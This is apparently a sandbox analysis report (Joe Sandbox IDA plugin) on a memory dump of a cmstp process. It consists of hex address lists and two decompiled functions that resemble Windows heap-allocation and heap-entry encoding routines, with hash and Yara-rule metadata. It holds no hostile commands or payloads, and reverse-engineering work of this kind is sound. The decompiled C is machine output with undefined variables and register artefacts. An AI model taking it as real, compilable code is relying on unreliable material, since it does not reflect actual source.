0x050ed956
0x050ed944
0x050ed92c
0x050ed78b
0x0513b394
0x050ed791
0x050ed798
0x0513b3a3
0x0513b3bb
0x0513b3bb
0x050ed7a5
0x050ed866
0x050ed870
0x050ed884
0x050ed892
0x050ed898
0x050ed89e
0x050ed8a0
0x050ed8a6
0x050ed8ac
0x050ed8ae
0x050ed8b4
0x050ed8b4
0x050ed8ae
0x050ed7a5
0x050ed78b
0x050ed7b1
0x0513b3c5
0x0513b3c5
0x050ed7c3
0x050ed7ca
0x050ed7e5
0x050ed7eb
0x050ed8eb
0x050ed8ed
0x00000000
0x050ed8f3
0x050ed8f3
0x050ed8f3
0x00000000
0x050ed8ed
0x050ed7cc
0x050ed7cc
0x050ed7d2
0x00000000
0x050ed7d4
0x050ed7d4
0x050ed7d7
0x050ed7df
0x0513b3d4
0x0513b3d9
0x0513b3dc
0x0513b3dc
0x0513b3df
0x0513b3e2
0x0513b468
0x0513b46d
0x0513b46f
0x0513b46f
0x0513b475
0x050ed8f8
0x050ed8f9
0x050ed8fd
0x0513b3e8
0x0513b3e8
0x0513b3eb
0x0513b3ed
0x00000000
0x0513b3ef
0x0513b3ef
0x0513b3f1
0x0513b3f4
0x0513b3fe
0x0513b404
0x0513b409
0x0513b40e
0x0513b410
0x0513b410
0x0513b414
0x0513b414
0x0513b41b
0x0513b420
0x0513b423
0x0513b425
0x0513b427
0x0513b42a
0x0513b42d
0x0513b42d
0x0513b42a
0x0513b432
0x0513b436
0x0513b438
0x0513b43b
0x0513b43b
0x0513b449
0x0513b44e
0x0513b454
0x0513b458
0x0513b458
0x0513b45d
0x00000000
0x0513b45d
0x0513b3ed
0x00000000
0x00000000
0x00000000
0x050ed7df
0x050ed7d2
0x050ed7ca
0x0513b37c
0x0513b37e
0x0513b385
0x0513b38a
0x00000000
0x0513b38a
0x050ed742
0x050ed7f1
0x050ed7f8
0x0513b49b
0x0513b49b
0x050ed800
0x050ed837
0x050ed843
0x050ed845
0x050ed847
0x050ed84a
0x050ed84b
0x050ed84e
0x050ed857
0x050ed802
0x050ed802
0x050ed80d
0x00000000
0x050ed818
0x050ed818
0x050ed824
0x050ed831
0x0513b4a5
0x0513b4ab
0x0513b4b3
0x0513b4b8
0x0513b4bb
0x00000000
0x0513b4c1
0x0513b4c1
0x0513b4c8
0x00000000
0x0513b4ce
0x0513b4d4
0x0513b4e1
0x0513b4e3
0x0513b4e5
0x00000000
0x0513b4eb
0x0513b4f0
0x0513b4f2
0x050edac9
0x050edacc
0x050edacf
0x050edad1
0x050edd78
0x050edd78
0x050edcf2
0x00000000
0x050edad7
0x050edad9
0x050edadb
0x00000000
0x00000000
0x050edae1
0x050edae1
0x050edae4
0x050edae6
0x0513b4f9
0x0513b4f9
0x0513b500
0x050edaec
0x050edaec
0x050edaf5
0x050edaf8
0x050edafb
0x050edb03
0x050edb11
0x050edb16
0x050edb19
0x050edb1b
0x0513b52c
0x0513b531
0x0513b534
0x050edb21
0x050edb21
0x050edb24
0x050edcd9
0x050edce2
0x050edce5
0x050edd6a
0x050edd6d
0x00000000
0x050edd73
0x0513b51a
0x0513b51c
0x0513b51f
0x0513b524
0x00000000
0x0513b524
0x050edce7
0x050edce7
0x050edce7
0x00000000
0x050edce7
0x00000000
0x050edb2a
0x050edb2c
0x050edb31
0x050edb33
0x050edb36
0x050edb39
0x050edb3b
0x050edb66
0x050edb66
0x050edb3d
0x050edb3d
0x050edb3e
0x050edb46
0x050edb47
0x050edb49
0x050edb4c
0x050edb53
0x050edb55
0x050edb58
0x050edb5a
0x0513b50a
0x0513b50f
0x0513b512
0x050edb60
0x050edb60
0x050edb63
0x050edb63
0x00000000
0x050edb63
0x050edb5a
0x050edb3b
0x050edb24
0x050edb69
0x050edb69
0x050edb6c
0x050edb6f
0x050edb74
0x0513b557
0x0513b557
0x0513b55e
0x050edb7a
0x050edb7c
0x050edb7f
0x050edb82
0x050edb85
0x00000000
0x050edb8b
0x050edb8b
0x050edb8d
0x050edb9b
0x050edb9b
0x050edb9d
0x050edba0
0x050edba2
0x050edba4
0x050edba7
0x050edba9
0x050edbae
0x050edbae
0x050edbb1
0x050edbb4
0x050edbb4
0x050edbb7
0x050edbba
0x050edcd2
0x050edcd4
0x00000000
0x050edbc0
0x050edbc0
0x050edbd2
0x050edbd7
0x050edbda
0x050edbdd
0x050edbdf
0x00000000
0x050edbe5
0x050edbe5
0x050edbee
0x050edbf1
0x0513b541
0x0513b544
0x00000000
0x0513b546
0x0513b546
0x00000000
0x0513b546
0x050edbf7
0x050edbf7
0x050edbfd
0x050edbfd
0x050edbff
0x050edc0b
0x050edc15
0x050edc1b
0x050edc1d
0x050edc21
0x050edc21
0x050edc23
0x050edc23
0x050edc26
0x050edc29
0x050edc2b
0x00000000
0x00000000
0x050edc31
0x050edc34
0x050edc36
0x050edcbf
0x050edcbf
0x050edcc2
0x00000000
0x050edc3c
0x050edc41
0x050edc43
0x00000000
0x050edc45
0x050edc45
0x050edc47
0x00000000
0x050edc4d
0x050edc4d
0x050edc50
0x050edc52
0x050edc55
0x050edcfa
0x050edcfe
0x050edd08
0x050edd0a
0x050edd0c
0x00000000
0x050edd12
0x050edd15
0x050edd2d
0x050edd2f
0x050edd32
0x050edd35
0x00000000
0x050edd35
0x050edc5b
0x050edc5b
0x050edc5e
0x050edc61
0x050edc64
0x050edc67
0x050edc67
0x050edc6a
0x050edc6c
0x050edc8e
0x050edc8e
0x050edc91
0x050edc93
0x050edcce
0x050edcce
0x050edc95
0x050edc9c
0x050edc6e
0x050edc72
0x050edc75
0x050edc77
0x050edc79
0x0513b551
0x0513b551
0x00000000
0x050edc7f
0x050edc7f
0x050edc81
0x00000000
0x050edc83
0x050edc86
0x050edc88
0x00000000
0x00000000
0x00000000
0x00000000
0x050edc88
0x050edc81
0x050edc79
0x050edc6c
0x050edc55
0x050edc47
0x050edc43
0x00000000
0x050edc36
0x050edc23
0x00000000
0x050edbff
0x050edbf1
0x050edbdf
0x050edb8f
0x050edb92
0x050edb95
0x00000000
0x00000000
0x00000000
0x00000000
0x050edb95
0x050edb8d
0x050edb85
0x050edb74
0x050edc9f
0x050edca2
0x050edcb0
0x050edcb0
0x050edad1
0x0513b4e5
0x0513b4c8
0x00000000
0x00000000
0x00000000
0x050ed831
0x050ed80d
0x00000000
0x050ed800
0x0513b47f
0x0513b485
0x00000000
0x0513b485
0x050ed665
0x050ed652
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49381b433de898bfaf16cb8ed01652479201d6c9b4b0e882519f7e5ec50e101d
Instruction ID: f7b56c1f816513b6e0151260aab829bd02ebbf34610231c362df0854740f48fb
Opcode Fuzzy Hash: 49381b433de898bfaf16cb8ed01652479201d6c9b4b0e882519f7e5ec50e101d
Instruction Fuzzy Hash: AFE1CF31B083598FEB24DF14D995BADBBB2FF45304F2401ADD94A97291EB30AD81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 050FB236 Relevance: .3, Instructions: 305
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E050FB236(signed int __ecx, intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t94;
				signed int _t96;
				intOrPtr _t97;
				unsigned int _t101;
				char _t103;
				signed int _t114;
				signed int _t115;
				signed char* _t118;
				intOrPtr _t119;
				signed int _t120;
				signed char* _t123;
				signed int _t129;
				char* _t132;
				unsigned int _t147;
				signed int _t157;
				unsigned int _t158;
				signed int _t159;
				signed int _t165;
				signed int _t168;
				signed char _t175;
				signed char _t185;
				unsigned int _t197;
				unsigned int _t206;
				unsigned int* _t214;
				signed int _t218;

				_t156 = __edx;
				_v24 = __edx;
				_t218 = __ecx;
				_t3 = _t156 + 0xfff; // 0xfff
				_t210 = 0;
				_v16 = _t3 & 0xfffff000;
				if(E050FB477(__ecx,  &_v16) == 0) {
					__eflags =  *(__ecx + 0x40) & 0x00000002;
					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
						L32:
						__eflags =  *(_t218 + 0x40) & 0x00000080;
						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
							_t210 = E0517CB4F(_t218);
							__eflags = _t210;
							if(_t210 == 0) {
								goto L33;
							}
							__eflags = ( *_t210 & 0x0000ffff) - _t156;
							if(( *_t210 & 0x0000ffff) < _t156) {
								goto L33;
							}
							_t157 = _t210;
							goto L3;
						}
						L33:
						_t157 = 0;
						__eflags = _t210;
						if(_t210 != 0) {
							__eflags =  *(_t218 + 0x4c);
							if( *(_t218 + 0x4c) != 0) {
								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
							}
						}
						goto L3;
					}
					_v12 = _v12 & 0;
					_t158 = __edx + 0x2000;
					_t94 =  *((intOrPtr*)(__ecx + 0x64));
					__eflags = _t158 - _t94;
					if(_t158 > _t94) {
						_t94 = _t158;
					}
					__eflags =  *((char*)(_t218 + 0xda)) - 2;
					if( *((char*)(_t218 + 0xda)) != 2) {
						_t165 = 0;
					} else {
						_t165 =  *(_t218 + 0xd4);
					}
					__eflags = _t165;
					if(_t165 == 0) {
						__eflags = _t94 - 0x3f4000;
						if(_t94 >= 0x3f4000) {
							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
						}
					}
					_t96 = _t94 + 0x0000ffff & 0xffff0000;
					_v8 = _t96;
					__eflags = _t96 - 0xfd0000;
					if(_t96 >= 0xfd0000) {
						_v8 = 0xfd0000;
					}
					_t97 = E05100678(_t218, 1);
					_push(_t97);
					_push(0x2000);
					_v28 = _t97;
					_push( &_v8);
					_push(0);
					_push( &_v12);
					_push(0xffffffff);
					_t168 = E05119660();
					__eflags = _t168;
					if(_t168 < 0) {
						while(1) {
							_t101 = _v8;
							__eflags = _t101 - _t158;
							if(_t101 == _t158) {
								break;
							}
							_t147 = _t101 >> 1;
							_v8 = _t147;
							__eflags = _t147 - _t158;
							if(_t147 < _t158) {
								_v8 = _t158;
							}
							_push(_v28);
							_push(0x2000);
							_push( &_v8);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t168 = E05119660();
							__eflags = _t168;
							if(_t168 < 0) {
								continue;
							} else {
								_t101 = _v8;
								break;
							}
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
						goto L60;
					} else {
						_t101 = _v8;
						L12:
						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
						_t103 = _v24 + 0x1000;
						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
							_t103 =  *((intOrPtr*)(_t218 + 0x68));
						}
						_push(_v28);
						_v20 = _t103;
						_push(0x1000);
						_push( &_v20);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						_t159 = E05119660();
						__eflags = _t159;
						if(_t159 < 0) {
							L59:
							E0510174B( &_v12,  &_v8, 0x8000);
							L60:
							_t156 = _v24;
							goto L32;
						} else {
							_t114 = E0510138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
							__eflags = _t114;
							if(_t114 == 0) {
								_t159 = 0xc0000017;
							}
							__eflags = _t159;
							if(_t159 < 0) {
								goto L59;
							} else {
								_t115 = E050F7D50();
								_t212 = 0x7ffe0380;
								__eflags = _t115;
								if(_t115 != 0) {
									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t118 = 0x7ffe0380;
								}
								__eflags =  *_t118;
								if( *_t118 != 0) {
									_t119 =  *[fs:0x30];
									__eflags =  *(_t119 + 0x240) & 0x00000001;
									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
										E0519138A(0x226, _t218, _v12, _v20, 4);
										__eflags = E050F7D50();
										if(__eflags != 0) {
											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E05191582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
									}
								}
								_t120 = E050F7D50();
								_t213 = 0x7ffe038a;
								__eflags = _t120;
								if(_t120 != 0) {
									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t123 = 0x7ffe038a;
								}
								__eflags =  *_t123;
								if( *_t123 != 0) {
									__eflags = E050F7D50();
									if(__eflags != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									}
									E05191582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
								}
								_t129 = E050F7D50();
								__eflags = _t129;
								if(_t129 != 0) {
									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								} else {
									_t132 = 0x7ffe0388;
								}
								__eflags =  *_t132;
								if( *_t132 != 0) {
									E0518FEC0(0x230, _t218, _v12, _v8);
								}
								__eflags =  *(_t218 + 0x4c);
								_t214 =  *(_v12 + 0x24);
								if( *(_t218 + 0x4c) != 0) {
									_t197 =  *(_t218 + 0x50) ^  *_t214;
									 *_t214 = _t197;
									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
									__eflags = _t197 >> 0x18 - _t175;
									if(__eflags != 0) {
										_push(_t175);
										E0518FA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
									}
								}
								_t157 =  *(_v12 + 0x24);
								goto L3;
							}
						}
					}
				} else {
					_v16 = _v16 >> 3;
					_t157 = E050F99BF(__ecx, _t87,  &_v16, 0);
					E050FA830(__ecx, _t157, _v16);
					if( *(_t218 + 0x4c) != 0) {
						_t206 =  *(_t218 + 0x50) ^  *_t157;
						 *_t157 = _t206;
						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
						if(_t206 >> 0x18 != _t185) {
							_push(_t185);
							E0518FA2B(_t157, _t218, _t157, 0, _t218, __eflags);
						}
					}
					L3:
					return _t157;
				}
			}

0x050fb23f
0x050fb246
0x050fb249
0x050fb24b
0x050fb251
0x050fb258
0x050fb262
0x050fb2b2
0x050fb2b6
0x050fb456
0x050fb456
0x050fb45a
0x05142912
0x05142914
0x05142916
0x00000000
0x00000000
0x0514291f
0x05142921
0x00000000
0x00000000
0x05142927
0x00000000
0x05142927
0x050fb460
0x050fb460
0x050fb462
0x050fb464
0x0514292e
0x05142931
0x0514293f
0x05142945
0x05142945
0x05142931
0x00000000
0x050fb464
0x050fb2bc
0x050fb2bf
0x050fb2c5
0x050fb2c8
0x050fb2ca
0x051427af
0x051427af
0x050fb2d0
0x050fb2d7
0x050fb437
0x050fb2dd
0x050fb2dd
0x050fb2dd
0x050fb2e3
0x050fb2e5
0x050fb43e
0x050fb443
0x051427b6
0x051427b6
0x050fb443
0x050fb2f5
0x050fb2fa
0x050fb2fd
0x050fb2ff
0x050fb46f
0x050fb46f
0x050fb30a
0x050fb30f
0x050fb310
0x050fb315
0x050fb31b
0x050fb31c
0x050fb321
0x050fb322
0x050fb329
0x050fb32b
0x050fb32d
0x051427c2
0x051427c2
0x051427c5
0x051427c7
0x00000000
0x00000000
0x051427c9
0x051427cb
0x051427ce
0x051427d0
0x051427d2
0x051427d2
0x051427d5
0x051427db
0x051427e0
0x051427e1
0x051427e6
0x051427e7
0x051427ee
0x051427f0
0x051427f2
0x00000000
0x051427f4
0x051427f4
0x00000000
0x051427f4
0x051427f2
0x051427f7
0x051427f9
0x00000000
0x00000000
0x051427ff
0x00000000
0x050fb333
0x050fb333
0x050fb336
0x050fb336
0x050fb33c
0x050fb341
0x050fb344
0x050fb44e
0x050fb44e
0x050fb34a
0x050fb34d
0x050fb353
0x050fb358
0x050fb359
0x050fb35e
0x050fb35f
0x050fb366
0x050fb368
0x050fb36a
0x051428f2
0x051428fe
0x05142903
0x05142903
0x00000000
0x050fb370
0x050fb38c
0x050fb391
0x050fb393
0x0514280a
0x0514280a
0x050fb399
0x050fb39b
0x00000000
0x050fb3a1
0x050fb3a1
0x050fb3a6
0x050fb3b0
0x050fb3b2
0x0514281d
0x050fb3b8
0x050fb3b8
0x050fb3b8
0x050fb3ba
0x050fb3bd
0x05142824
0x0514282a
0x05142831
0x05142841
0x0514284b
0x0514284d
0x05142858
0x05142858
0x05142858
0x05142870
0x05142870
0x05142831
0x050fb3c3
0x050fb3c8
0x050fb3d2
0x050fb3d4
0x05142883
0x050fb3da
0x050fb3da
0x050fb3da
0x050fb3dc
0x050fb3df
0x0514288f
0x05142891
0x0514289c
0x0514289c
0x0514289c
0x051428b4
0x051428b4
0x050fb3e5
0x050fb3ea
0x050fb3ec
0x051428c7
0x050fb3f2
0x050fb3f2
0x050fb3f2
0x050fb3f7
0x050fb3fa
0x051428d9
0x051428d9
0x050fb400
0x050fb407
0x050fb40a
0x050fb40f
0x050fb413
0x050fb41f
0x050fb424
0x050fb426
0x051428e3
0x051428e8
0x051428e8
0x050fb426
0x050fb42f
0x00000000
0x050fb42f
0x050fb39b
0x050fb36a
0x050fb264
0x050fb264
0x050fb279
0x050fb27f
0x050fb287
0x050fb28c
0x050fb290
0x050fb29c
0x050fb2a3
0x051427a0
0x051427a5
0x051427a5
0x050fb2a3
0x050fb2a9
0x050fb2b1
0x050fb2b1

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
Instruction ID: db6e7d2742ff0b9ca0a0287e64d8b793d897e0f4dfd64200da4538e6240b8b92
Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
Instruction Fuzzy Hash: 19B1E035B046069FDB25DBA9D894BBEB7F6BF84200F140169EA52D7781DB30E941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 050E849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E050E849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x51af9c0);
				E0512D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x51c7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E050ECEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E050F2280( *[fs:0x30], 0x51c8550);
						_t139 =  *0x51c7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0510F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E050EFFB0(_t193, _t235, 0x51c8550);
								L5:
								return E0512D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E050D1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x51c7b9c; // 0x0
							_t235 = L050F4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x51c7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0510A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E050EFFB0(_t193, _t235, 0x51c8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L050F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L050F77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x51c7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x51c7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E051137C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x51c7b9c; // 0x0
									_t214 = L050F4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E051137F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x51c7b10 =  *0x51c7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x51c7b04 =  *0x51c7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L050F77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L050F77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x51c7b08 =  *0x51c7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E051157C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0511F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L050F77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0510A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L050F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E051196C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x050e849b
0x050e849b
0x050e849b
0x050e849b
0x050e849d
0x050e84a2
0x050e84a7
0x050e84b1
0x050e84d8
0x00000000
0x050e84b3
0x050e84c4
0x050e84c9
0x050e84cd
0x050e84cf
0x050e84cf
0x050e84d6
0x050e84e6
0x050e84e9
0x050e84ec
0x050e84ef
0x050e84f2
0x050e84f4
0x050e84fc
0x050e8501
0x050e8506
0x050e8509
0x050e86e0
0x050e86e5
0x050e86e8
0x050e86ed
0x050e86f0
0x050e86f2
0x05139afd
0x05139b02
0x050e84da
0x050e84df
0x050e84df
0x050e86fa
0x050e86fd
0x050e86fe
0x050e8701
0x050e8706
0x050e8709
0x050e870b
0x00000000
0x00000000
0x050e8711
0x050e8725
0x050e8727
0x050e872a
0x050e872c
0x05139af0
0x05139af5
0x050e8732
0x050e8732
0x050e8732
0x050e8735
0x050e8737
0x050e8515
0x050e8515
0x050e8518
0x050e851d
0x050e8523
0x050e8527
0x050e852b
0x050e8537
0x050e8539
0x050e853c
0x050e853e
0x050e868c
0x050e8691
0x050e8699
0x050e869b
0x050e8744
0x050e8748
0x050e86a1
0x050e86a1
0x050e86a1
0x050e86a4
0x050e86a8
0x05139bdf
0x05139bdf
0x050e86ae
0x050e86b0
0x00000000
0x050e86b6
0x00000000
0x05139be9
0x050e86b0
0x050e8544
0x050e854a
0x050e854d
